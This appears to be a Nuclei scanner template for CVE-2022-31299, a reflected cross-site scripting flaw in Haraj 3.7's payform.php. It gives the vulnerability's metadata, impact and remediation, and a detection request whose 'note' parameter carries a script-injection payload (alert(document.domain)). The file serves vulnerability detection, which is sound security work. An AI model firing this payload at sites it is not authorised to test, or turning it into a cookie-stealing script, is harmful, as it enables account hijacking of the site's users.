id: CVE-2022-31299 info: name: Haraj 3.7 - Cross-Site Scripting author: edoardottt severity: medium description: | Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/bigzooooz/CVE-2022-31299 - https://angtech.org - https://nvd.nist.gov/vuln/detail/CVE-2022-31299 - https://angtech.org/product/view/3 - https://github.com/trhacknon/Pocingit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-31299 cwe-id: CWE-79 epss-score: 0.00209 epss-percentile: 0.58245 cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: angtech product: haraj tags: cve,cve2022,haraj,xss,angtech http: - method: GET path: - "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1¬e=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers-condition: and matchers: - type: word part: body words: - '>' - 'content="nextHaraj' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a004630440220107082951fb57d51f08b7e519d2eddac32a210758fa0a1e697b5481071bcdf4d0220106c1631d6f85f20235fddd9930929c3bd344de8de936b4a700dd0e93f9d9912:922c64590222798bb761d5b6d8e72950